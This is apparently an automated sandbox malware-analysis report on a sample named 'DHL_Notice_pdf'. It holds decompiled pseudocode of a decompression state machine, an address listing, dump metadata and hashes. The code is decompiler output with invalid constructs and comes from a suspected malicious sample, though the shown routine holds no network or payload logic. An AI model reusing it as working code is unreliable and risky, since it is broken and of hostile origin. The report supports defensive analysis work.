                                                            							__eax = _v95 & 0x000000ff;
                                                            							_v95 = _v95 << 1;
                                                            							__ecx = _v92;
                                                            							__eax = (_v95 & 0x000000ff) >> 7;
                                                            							_v76 = __eax;
                                                            							__eax = __eax + 1;
                                                            							__eax = __eax << 8;
                                                            							__eax = __eax + __ebx;
                                                            							__esi = _v92 + __eax * 2;
                                                            							_v20 = _v20 >> 0xb;
                                                            							__ax =  *__esi;
                                                            							_v88 = __esi;
                                                            							__edx = __ax & 0x0000ffff;
                                                            							__ecx = (_v20 >> 0xb) * __edx;
                                                            							__eflags = _v16 - __ecx;
                                                            							if(_v16 >= __ecx) {
                                                            								_v20 = _v20 - __ecx;
                                                            								_v16 = _v16 - __ecx;
                                                            								__cx = __ax;
                                                            								_v68 = 1;
                                                            								__cx = __ax >> 5;
                                                            								__eflags = __eax;
                                                            								__ebx = __ebx + __ebx + 1;
                                                            								 *__esi = __ax;
                                                            							} else {
                                                            								_v68 = _v68 & 0x00000000;
                                                            								_v20 = __ecx;
                                                            								0x800 = 0x800 - __edx;
                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            								__ebx = __ebx + __ebx;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags = _v20 - 0x1000000;
                                                            							_v72 = __ebx;
                                                            							if(_v20 >= 0x1000000) {
                                                            								goto L41;
                                                            							} else {
                                                            								goto L39;
                                                            							}
                                                            						case 0xe:
                                                            							L48:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 0xe;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v116;
                                                            							__eax = _v16;
                                                            							_v20 = _v20 << 8;
                                                            							__ecx =  *_v116 & 0x000000ff;
                                                            							_v112 = _v112 - 1;
                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							_t161 =  &_v116;
                                                            							 *_t161 = _v116 + 1;
                                                            							__eflags =  *_t161;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							while(1) {
                                                            								L50:
                                                            								__eflags = __ebx - 0x100;
                                                            								if(__ebx >= 0x100) {
                                                            									break;
                                                            								}
                                                            								__eax = _v92;
                                                            								__edx = __ebx + __ebx;
                                                            								__ecx = _v20;
                                                            								__esi = __edx + __eax;
                                                            								__ecx = _v20 >> 0xb;
                                                            								__ax =  *__esi;
                                                            								_v88 = __esi;
                                                            								__edi = __ax & 0x0000ffff;
                                                            								__ecx = (_v20 >> 0xb) * __edi;
                                                            								__eflags = _v16 - __ecx;
                                                            								if(_v16 >= __ecx) {
                                                            									_v20 = _v20 - __ecx;
                                                            									_v16 = _v16 - __ecx;
                                                            									__cx = __ax;
                                                            									_t175 = __edx + 1; // 0x1
                                                            									__ebx = _t175;
                                                            									__cx = __ax >> 5;
                                                            									__eflags = __eax;
                                                            									 *__esi = __ax;
                                                            								} else {
                                                            									_v20 = __ecx;
                                                            									0x800 = 0x800 - __edi;
                                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            									__ebx = __ebx + __ebx;
                                                            									 *__esi = __cx;
                                                            								}
                                                            								__eflags = _v20 - 0x1000000;
                                                            								_v72 = __ebx;
                                                            								if(_v20 >= 0x1000000) {
                                                            									continue;
                                                            								} else {
                                                            									goto L48;
                                                            								}
                                                            							}
                                                            							L56:
                                                            							_t178 =  &_v56;
                                                            							 *_t178 = _v56 & 0x00000000;
                                                            							__eflags =  *_t178;
                                                            							goto L57;
                                                            						case 0xf:
                                                            							L60:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 0xf;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v116;
                                                            							__eax = _v16;
                                                            							_v20 = _v20 << 8;
                                                            							__ecx =  *_v116 & 0x000000ff;
                                                            							_v112 = _v112 - 1;
                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							_t208 =  &_v116;
                                                            							 *_t208 = _v116 + 1;
                                                            							__eflags =  *_t208;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							L62:
                                                            							__eflags = __ebx - 0x100;
                                                            							if(__ebx >= 0x100) {
                                                            								L57:
                                                            								__al = _v72;
                                                            								_v96 = _v72;
                                                            								goto L58;
                                                            							}
                                                            							L63:
                                                            							__eax = _v92;
                                                            							__edx = __ebx + __ebx;
                                                            							__ecx = _v20;
                                                            							__esi = __edx + __eax;
                                                            							__ecx = _v20 >> 0xb;
                                                            							__ax =  *__esi;
                                                            							_v88 = __esi;
                                                            							__edi = __ax & 0x0000ffff;
                                                            							__ecx = (_v20 >> 0xb) * __edi;
                                                            							__eflags = _v16 - __ecx;
                                                            							if(_v16 >= __ecx) {
                                                            								_v20 = _v20 - __ecx;
                                                            								_v16 = _v16 - __ecx;
                                                            								__cx = __ax;
                                                            								_t222 = __edx + 1; // 0x1
                                                            								__ebx = _t222;
                                                            								__cx = __ax >> 5;
                                                            								__eflags = __eax;
                                                            								 *__esi = __ax;
                                                            							} else {
                                                            								_v20 = __ecx;
                                                            								0x800 = 0x800 - __edi;
                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            								__ebx = __ebx + __ebx;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags = _v20 - 0x1000000;
                                                            							_v72 = __ebx;
                                                            							if(_v20 >= 0x1000000) {
                                                            								goto L62;
                                                            							} else {
                                                            								goto L60;
                                                            							}
                                                            						case 0x10:
                                                            							L112:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 0x10;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v116;
                                                            							__eax = _v16;
                                                            							_v20 = _v20 << 8;
                                                            							__ecx =  *_v116 & 0x000000ff;
                                                            							_v112 = _v112 - 1;
                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							_t371 =  &_v116;
                                                            							 *_t371 = _v116 + 1;
                                                            							__eflags =  *_t371;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							goto L114;
                                                            						case 0x11:
                                                            							L71:
                                                            							__esi = _v92;
                                                            							_v136 = 0x12;
                                                            							goto L135;
                                                            						case 0x12:
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								__eax = _v92;
                                                            								_v136 = 0x13;
                                                            								__esi = _v92 + 2;
                                                            								L135:
                                                            								_v88 = _t626;
                                                            								goto L136;
                                                            							}
                                                            							__eax = _v80;
                                                            							_v52 = _v52 & 0x00000000;
                                                            							__ecx = _v92;
                                                            							__eax = _v80 << 4;
                                                            							__eflags = __eax;
                                                            							__eax = _v92 + __eax + 4;
                                                            							goto L133;
                                                            						case 0x13:
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								_t475 =  &_v92;
                                                            								 *_t475 = _v92 + 0x204;
                                                            								__eflags =  *_t475;
                                                            								_v52 = 0x10;
                                                            								_v68 = 8;
                                                            								L147:
                                                            								_v128 = 0x14;
                                                            								goto L148;
                                                            							}
                                                            							__eax = _v80;
                                                            							__ecx = _v92;
                                                            							__eax = _v80 << 4;
                                                            							_v52 = 8;
                                                            							__eax = _v92 + (_v80 << 4) + 0x104;
                                                            							L133:
                                                            							_v92 = __eax;
                                                            							_v68 = 3;
                                                            							goto L147;
                                                            						case 0x14:
                                                            							_v52 = _v52 + __ebx;
                                                            							__eax = _v132;
                                                            							goto L143;
                                                            						case 0x15:
                                                            							__eax = 0;
                                                            							__eflags = _v60 - 7;
                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            							__al = __al & 0x000000fd;
                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                            							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                            							goto L123;
                                                            						case 0x16:
                                                            							__eax = _v52;
                                                            							__eflags = __eax - 4;
                                                            							if(__eax >= 4) {
                                                            								_push(3);
                                                            								_pop(__eax);
                                                            							}
                                                            							__ecx = _v8;
                                                            							_v68 = 6;
                                                            							__eax = __eax << 7;
                                                            							_v128 = 0x19;
                                                            							_v92 = __eax;
                                                            							goto L148;
                                                            						case 0x17:
                                                            							L148:
                                                            							__eax = _v68;
                                                            							_v84 = 1;
                                                            							_v76 = _v68;
                                                            							goto L152;
                                                            						case 0x18:
                                                            							L149:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 0x18;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v116;
                                                            							__eax = _v16;
                                                            							_v20 = _v20 << 8;
                                                            							__ecx =  *_v116 & 0x000000ff;
                                                            							_v112 = _v112 - 1;
                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							_t490 =  &_v116;
                                                            							 *_t490 = _v116 + 1;
                                                            							__eflags =  *_t490;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							L151:
                                                            							_t493 =  &_v76;
                                                            							 *_t493 = _v76 - 1;
                                                            							__eflags =  *_t493;
                                                            							L152:
                                                            							__eflags = _v76;
                                                            							if(_v76 <= 0) {
                                                            								__ecx = _v68;
                                                            								__ebx = _v84;
                                                            								0 = 1;
                                                            								__eax = 1 << __cl;
                                                            								__ebx = _v84 - (1 << __cl);
                                                            								__eax = _v128;
                                                            								_v72 = __ebx;
                                                            								L143:
                                                            								_v140 = _t561;
                                                            								goto L3;
                                                            							}
                                                            							__eax = _v84;
                                                            							_v20 = _v20 >> 0xb;
                                                            							__edx = _v84 + _v84;
                                                            							__eax = _v92;
                                                            							__esi = __edx + __eax;
                                                            							_v88 = __esi;
                                                            							__ax =  *__esi;
                                                            							__edi = __ax & 0x0000ffff;
                                                            							__ecx = (_v20 >> 0xb) * __edi;
                                                            							__eflags = _v16 - __ecx;
                                                            							if(_v16 >= __ecx) {
                                                            								_v20 = _v20 - __ecx;
                                                            								_v16 = _v16 - __ecx;
                                                            								__cx = __ax;
                                                            								__cx = __ax >> 5;
                                                            								__eax = __eax - __ecx;
                                                            								__edx = __edx + 1;
                                                            								__eflags = __edx;
                                                            								 *__esi = __ax;
                                                            								_v84 = __edx;
                                                            							} else {
                                                            								_v20 = __ecx;
                                                            								0x800 = 0x800 - __edi;
                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            								_v84 = _v84 << 1;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags = _v20 - 0x1000000;
                                                            							if(_v20 >= 0x1000000) {
                                                            								goto L151;
                                                            							} else {
                                                            								goto L149;
                                                            							}
                                                            						case 0x19:
                                                            							__eflags = __ebx - 4;
                                                            							if(__ebx < 4) {
                                                            								_v48 = __ebx;
                                                            								L122:
                                                            								_t399 =  &_v48;
                                                            								 *_t399 = _v48 + 1;
                                                            								__eflags =  *_t399;
                                                            								L123:
                                                            								__eax = _v48;
                                                            								__eflags = __eax;
                                                            								if(__eax == 0) {
                                                            									_v52 = _v52 | 0xffffffff;
                                                            									goto L173;
                                                            								}
                                                            								__eflags = __eax - _v100;
                                                            								if(__eax > _v100) {
                                                            									goto L174;
                                                            								}
                                                            								_v52 = _v52 + 2;
                                                            								__eax = _v52;
                                                            								_t406 =  &_v100;
                                                            								 *_t406 = _v100 + _v52;
                                                            								__eflags =  *_t406;
                                                            								goto L126;
                                                            							}
                                                            							__ecx = __ebx;
                                                            							__eax = __ebx;
                                                            							__ecx = __ebx >> 1;
                                                            							__eax = __ebx & 0x00000001;
                                                            							__ecx = (__ebx >> 1) - 1;
                                                            							__al = __al | 0x00000002;
                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                            							__eflags = __ebx - 0xe;
                                                            							_v48 = __eax;
                                                            							if(__ebx >= 0xe) {
                                                            								__ebx = 0;
                                                            								_v76 = __ecx;
                                                            								L105:
                                                            								__eflags = _v76;
                                                            								if(_v76 <= 0) {
                                                            									__eax = __eax + __ebx;
                                                            									_v68 = 4;
                                                            									_v48 = __eax;
                                                            									__eax = _v8;
                                                            									__eax = _v8 + 0x644;
                                                            									__eflags = __eax;
                                                            									L111:
                                                            									__ebx = 0;
                                                            									_v92 = __eax;
                                                            									_v84 = 1;
                                                            									_v72 = 0;
                                                            									_v76 = 0;
                                                            									L115:
                                                            									__eax = _v68;
                                                            									__eflags = _v76 - _v68;
                                                            									if(_v76 >= _v68) {
                                                            										_t397 =  &_v48;
                                                            										 *_t397 = _v48 + __ebx;
                                                            										__eflags =  *_t397;
                                                            										goto L122;
                                                            									}
                                                            									__eax = _v84;
                                                            									_v20 = _v20 >> 0xb;
                                                            									__edi = _v84 + _v84;
                                                            									__eax = _v92;
                                                            									__esi = __edi + __eax;
                                                            									_v88 = __esi;
                                                            									__ax =  *__esi;
                                                            									__ecx = __ax & 0x0000ffff;
                                                            									__edx = (_v20 >> 0xb) * __ecx;
                                                            									__eflags = _v16 - __edx;
                                                            									if(_v16 >= __edx) {
                                                            										__ecx = 0;
                                                            										_v20 = _v20 - __edx;
                                                            										__ecx = 1;
                                                            										_v16 = _v16 - __edx;
                                                            										__ebx = 1;
                                                            										__ecx = _v76;
                                                            										__ebx = 1 << __cl;
                                                            										__ecx = 1 << __cl;
                                                            										__ebx = _v72;
                                                            										__ebx = _v72 | __ecx;
                                                            										__cx = __ax;
                                                            										__cx = __ax >> 5;
                                                            										__eax = __eax - __ecx;
                                                            										__edi = __edi + 1;
                                                            										__eflags = __edi;
                                                            										_v72 = __ebx;
                                                            										 *__esi = __ax;
                                                            										_v84 = __edi;
                                                            									} else {
                                                            										_v20 = __edx;
                                                            										0x800 = 0x800 - __ecx;
                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            										_v84 = _v84 << 1;
                                                            										 *__esi = __dx;
                                                            									}
                                                            									__eflags = _v20 - 0x1000000;
                                                            									if(_v20 >= 0x1000000) {
                                                            										L114:
                                                            										_t374 =  &_v76;
                                                            										 *_t374 = _v76 + 1;
                                                            										__eflags =  *_t374;
                                                            										goto L115;
                                                            									} else {
                                                            										goto L112;
                                                            									}
                                                            								}
                                                            								__ecx = _v16;
                                                            								__ebx = __ebx + __ebx;
                                                            								_v20 = _v20 >> 1;
                                                            								__eflags = _v16 - _v20;
                                                            								_v72 = __ebx;
                                                            								if(_v16 >= _v20) {
                                                            									__ecx = _v20;
                                                            									_v16 = _v16 - _v20;
                                                            									__ebx = __ebx | 0x00000001;
                                                            									__eflags = __ebx;
                                                            									_v72 = __ebx;
                                                            								}
                                                            								__eflags = _v20 - 0x1000000;
                                                            								if(_v20 >= 0x1000000) {
                                                            									L104:
                                                            									_t344 =  &_v76;
                                                            									 *_t344 = _v76 - 1;
                                                            									__eflags =  *_t344;
                                                            									goto L105;
                                                            								} else {
                                                            									goto L102;
                                                            								}
                                                            							}
                                                            							__edx = _v8;
                                                            							__eax = __eax - __ebx;
                                                            							_v68 = __ecx;
                                                            							__eax = _v8 + 0x55e + __eax * 2;
                                                            							goto L111;
                                                            						case 0x1a:
                                                            							L58:
                                                            							__eflags = _v104;
                                                            							if(_v104 == 0) {
                                                            								_v140 = 0x1a;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v108;
                                                            							__al = _v96;
                                                            							__edx = _v12;
                                                            							_v100 = _v100 + 1;
                                                            							_v108 = _v108 + 1;
                                                            							_v104 = _v104 - 1;
                                                            							 *_v108 = __al;
                                                            							__ecx = _v24;
                                                            							 *(_v12 + __ecx) = __al;
                                                            							__eax = __ecx + 1;
                                                            							__edx = 0;
                                                            							_t197 = __eax % _v120;
                                                            							__eax = __eax / _v120;
                                                            							__edx = _t197;
                                                            							goto L82;
                                                            						case 0x1b:
                                                            							L78:
                                                            							__eflags = _v104;
                                                            							if(_v104 == 0) {
                                                            								_v140 = 0x1b;
                                                            								goto L173;
                                                            							}
                                                            							__eax = _v24;
                                                            							__eax = _v24 - _v48;
                                                            							__eflags = __eax - _v120;
                                                            							if(__eax >= _v120) {
                                                            								__eax = __eax + _v120;
                                                            								__eflags = __eax;
                                                            							}
                                                            							__edx = _v12;
                                                            							__cl =  *(__edx + __eax);
                                                            							__eax = _v24;
                                                            							_v96 = __cl;
                                                            							 *(__edx + __eax) = __cl;
                                                            							__eax = __eax + 1;
                                                            							__edx = 0;
                                                            							_t280 = __eax % _v120;
                                                            							__eax = __eax / _v120;
                                                            							__edx = _t280;
                                                            							__eax = _v108;
                                                            							_v100 = _v100 + 1;
                                                            							_v108 = _v108 + 1;
                                                            							_t289 =  &_v104;
                                                            							 *_t289 = _v104 - 1;
                                                            							__eflags =  *_t289;
                                                            							 *_v108 = __cl;
                                                            							L82:
                                                            							_v24 = __edx;
                                                            							goto L83;
                                                            						case 0x1c:
                                                            							while(1) {
                                                            								L126:
                                                            								__eflags = _v104;
                                                            								if(_v104 == 0) {
                                                            									break;
                                                            								}
                                                            								__eax = _v24;
                                                            								__eax = _v24 - _v48;
                                                            								__eflags = __eax - _v120;
                                                            								if(__eax >= _v120) {
                                                            									__eax = __eax + _v120;
                                                            									__eflags = __eax;
                                                            								}
                                                            								__edx = _v12;
                                                            								__cl =  *(__edx + __eax);
                                                            								__eax = _v24;
                                                            								_v96 = __cl;
                                                            								 *(__edx + __eax) = __cl;
                                                            								__eax = __eax + 1;
                                                            								__edx = 0;
                                                            								_t420 = __eax % _v120;
                                                            								__eax = __eax / _v120;
                                                            								__edx = _t420;
                                                            								__eax = _v108;
                                                            								_v108 = _v108 + 1;
                                                            								_v104 = _v104 - 1;
                                                            								_v52 = _v52 - 1;
                                                            								__eflags = _v52;
                                                            								 *_v108 = __cl;
                                                            								_v24 = _t420;
                                                            								if(_v52 > 0) {
                                                            									continue;
                                                            								} else {
                                                            									L83:
                                                            									_v140 = 2;
                                                            									goto L3;
                                                            								}
                                                            							}
                                                            							_v140 = 0x1c;
                                                            							L173:
                                                            							_push(0x22);
                                                            							_pop(_t574);
                                                            							memcpy(_v148,  &_v140, _t574 << 2);
                                                            							return 0;
                                                            					}
                                                            				}
                                                            				L174:
                                                            				_t538 = _t537 | 0xffffffff;
                                                            				return _t538;
                                                            			}










































                                                            0x00406d3f
                                                            0x00406d42
                                                            0x00406d4f
                                                            0x00406d57
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d0e
                                                            0x00406d0e
                                                            0x00406d12
                                                            0x0040755d
                                                            0x00000000
                                                            0x0040755d
                                                            0x00406d1e
                                                            0x00406d29
                                                            0x00406d29
                                                            0x00406d29
                                                            0x00406d2c
                                                            0x00406d2f
                                                            0x00406d32
                                                            0x00406d35
                                                            0x00406d37
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004073ce
                                                            0x004073ce
                                                            0x004073d4
                                                            0x004073da
                                                            0x004073dd
                                                            0x004073e0
                                                            0x004073fa
                                                            0x004073fd
                                                            0x00407403
                                                            0x0040740e
                                                            0x0040740e
                                                            0x00407410
                                                            0x004073e2
                                                            0x004073e2
                                                            0x004073f1
                                                            0x004073f5
                                                            0x004073f5
                                                            0x00407413
                                                            0x0040741a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040741c
                                                            0x0040741c
                                                            0x00407420
                                                            0x004075cf
                                                            0x00000000
                                                            0x004075cf
                                                            0x0040742c
                                                            0x00407433
                                                            0x0040743b
                                                            0x0040743b
                                                            0x0040743b
                                                            0x0040743e
                                                            0x00407441
                                                            0x00407441
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d5f
                                                            0x00406d61
                                                            0x00406d64
                                                            0x00406dd5
                                                            0x00406dd8
                                                            0x00406ddb
                                                            0x00406de2
                                                            0x00406dec
                                                            0x00000000
                                                            0x00406dec
                                                            0x00406d66
                                                            0x00406d6a
                                                            0x00406d6d
                                                            0x00406d6f
                                                            0x00406d72
                                                            0x00406d75
                                                            0x00406d77
                                                            0x00406d7a
                                                            0x00406d7c
                                                            0x00406d81
                                                            0x00406d84
                                                            0x00406d87
                                                            0x00406d8b
                                                            0x00406d92
                                                            0x00406d95
                                                            0x00406d9c
                                                            0x00406da0
                                                            0x00406da8
                                                            0x00406da8
                                                            0x00406da8
                                                            0x00406da2
                                                            0x00406da2
                                                            0x00406da2
                                                            0x00406d97
                                                            0x00406d97
                                                            0x00406d97
                                                            0x00406dac
                                                            0x00406daf
                                                            0x00406dcd
                                                            0x00406dcf
                                                            0x00000000
                                                            0x00406dcf
                                                            0x00406db1
                                                            0x00406db4
                                                            0x00406db7
                                                            0x00406dba
                                                            0x00406dbc
                                                            0x00406dbc
                                                            0x00406dbc
                                                            0x00406dbf
                                                            0x00406dc2
                                                            0x00406dc4
                                                            0x00406dc5
                                                            0x00406dc8
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ffe
                                                            0x00407002
                                                            0x00407020
                                                            0x00407023
                                                            0x0040702a
                                                            0x0040702d
                                                            0x00407030
                                                            0x00407033
                                                            0x00407036
                                                            0x00407039
                                                            0x0040703b
                                                            0x00407042
                                                            0x00407043
                                                            0x00407045
                                                            0x00407048
                                                            0x0040704b
                                                            0x0040704e
                                                            0x0040704e
                                                            0x00407053
                                                            0x00000000
                                                            0x00407053
                                                            0x00407004
                                                            0x00407007
                                                            0x0040700a
                                                            0x00407014
                                                            0x00000000
                                                            0x00000000
                                                            0x00407068
                                                            0x0040706c
                                                            0x0040708f
                                                            0x00407092
                                                            0x00407095
                                                            0x0040709f
                                                            0x0040706e
                                                            0x0040706e
                                                            0x00407071
                                                            0x00407074
                                                            0x00407077
                                                            0x00407084
                                                            0x00407087
                                                            0x00407087
                                                            0x00000000
                                                            0x00000000
                                                            0x004070ab
                                                            0x004070af
                                                            0x00000000
                                                            0x00000000
                                                            0x004070b5
                                                            0x004070b9
                                                            0x00000000
                                                            0x00000000
                                                            0x004070bf
                                                            0x004070c1
                                                            0x004070c5
                                                            0x004070c5
                                                            0x004070c8
                                                            0x004070cc
                                                            0x00000000
                                                            0x00000000
                                                            0x0040711c
                                                            0x00407120
                                                            0x00407127
                                                            0x0040712a
                                                            0x0040712d
                                                            0x00407137
                                                            0x00000000
                                                            0x00407137
                                                            0x00407122
                                                            0x00000000
                                                            0x00000000
                                                            0x00407143
                                                            0x00407147
                                                            0x0040714e
                                                            0x00407151
                                                            0x00407154
                                                            0x00407149
                                                            0x00407149
                                                            0x00407149
                                                            0x00407157
                                                            0x0040715a
                                                            0x0040715d
                                                            0x0040715d
                                                            0x00407160
                                                            0x00407163
                                                            0x00407166
                                                            0x00407166
                                                            0x00407169
                                                            0x00407170
                                                            0x00407175
                                                            0x00000000
                                                            0x00000000
                                                            0x00407203
                                                            0x00407203
                                                            0x00407207
                                                            0x004075a5
                                                            0x00000000
                                                            0x004075a5
                                                            0x0040720d
                                                            0x00407210
                                                            0x00407213
                                                            0x00407217
                                                            0x0040721a
                                                            0x00407220
                                                            0x00407222
                                                            0x00407222
                                                            0x00407222
                                                            0x00407225
                                                            0x00407228
                                                            0x00000000
                                                            0x00000000
                                                            0x00406df8
                                                            0x00406df8
                                                            0x00406dfc
                                                            0x00407569
                                                            0x00000000
                                                            0x00407569
                                                            0x00406e02
                                                            0x00406e05
                                                            0x00406e08
                                                            0x00406e0c
                                                            0x00406e0f
                                                            0x00406e15
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e1a
                                                            0x00406e1d
                                                            0x00406e1d
                                                            0x00406e20
                                                            0x00406e23
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e29
                                                            0x00406e2f
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e35
                                                            0x00406e35
                                                            0x00406e39
                                                            0x00406e3c
                                                            0x00406e3f
                                                            0x00406e42
                                                            0x00406e45
                                                            0x00406e46
                                                            0x00406e49
                                                            0x00406e4b
                                                            0x00406e51
                                                            0x00406e54
                                                            0x00406e57
                                                            0x00406e5a
                                                            0x00406e5d
                                                            0x00406e60
                                                            0x00406e63
                                                            0x00406e7f
                                                            0x00406e82
                                                            0x00406e85
                                                            0x00406e88
                                                            0x00406e8f
                                                            0x00406e93
                                                            0x00406e95
                                                            0x00406e99
                                                            0x00406e65
                                                            0x00406e65
                                                            0x00406e69
                                                            0x00406e71
                                                            0x00406e76
                                                            0x00406e78
                                                            0x00406e7a
                                                            0x00406e7a
                                                            0x00406e9c
                                                            0x00406ea3
                                                            0x00406ea6
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eb1
                                                            0x00406eb1
                                                            0x00406eb5
                                                            0x00407575
                                                            0x00000000
                                                            0x00407575
                                                            0x00406ebb
                                                            0x00406ebe
                                                            0x00406ec1
                                                            0x00406ec5
                                                            0x00406ec8
                                                            0x00406ece
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed3
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406edc
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ede
                                                            0x00406ee1
                                                            0x00406ee4
                                                            0x00406ee7
                                                            0x00406eea
                                                            0x00406eed
                                                            0x00406ef0
                                                            0x00406ef3
                                                            0x00406ef6
                                                            0x00406ef9
                                                            0x00406efc
                                                            0x00406f14
                                                            0x00406f17
                                                            0x00406f1a
                                                            0x00406f1d
                                                            0x00406f1d
                                                            0x00406f20
                                                            0x00406f24
                                                            0x00406f26
                                                            0x00406efe
                                                            0x00406efe
                                                            0x00406f06
                                                            0x00406f0b
                                                            0x00406f0d
                                                            0x00406f0f
                                                            0x00406f0f
                                                            0x00406f29
                                                            0x00406f30
                                                            0x00406f33
                                                            0x00000000
                                                            0x00406f35
                                                            0x00000000
                                                            0x00406f35
                                                            0x00406f33
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f75
                                                            0x00406f75
                                                            0x00406f79
                                                            0x00407581
                                                            0x00000000
                                                            0x00407581
                                                            0x00406f7f
                                                            0x00406f82
                                                            0x00406f85
                                                            0x00406f89
                                                            0x00406f8c
                                                            0x00406f92
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f97
                                                            0x00406f9a
                                                            0x00406f9a
                                                            0x00406fa0
                                                            0x00406f3e
                                                            0x00406f3e
                                                            0x00406f41
                                                            0x00000000
                                                            0x00406f41
                                                            0x00406fa2
                                                            0x00406fa2
                                                            0x00406fa5
                                                            0x00406fa8
                                                            0x00406fab
                                                            0x00406fae
                                                            0x00406fb1
                                                            0x00406fb4
                                                            0x00406fb7

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                            • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                            • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                            • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E00406FFE() {
                                                            				signed int _t539;
                                                            				unsigned short _t540;
                                                            				signed int _t541;
                                                            				void _t542;
                                                            				signed int _t543;
                                                            				signed int _t544;
                                                            				signed int _t573;
                                                            				signed int _t576;
                                                            				signed int _t597;
                                                            				signed int* _t614;
                                                            				void* _t621;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					if( *(_t621 - 0x40) != 1) {
                                                            						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                            						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                            						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                            						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                            						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                            						_t539 =  *(_t621 - 4) + 0x664;
                                                            						 *(_t621 - 0x58) = _t539;
                                                            						goto L68;
                                                            					} else {
                                                            						 *(__ebp - 0x84) = 8;
                                                            						while(1) {
                                                            							L132:
                                                            							 *(_t621 - 0x54) = _t614;
                                                            							while(1) {
                                                            								L133:
                                                            								_t540 =  *_t614;
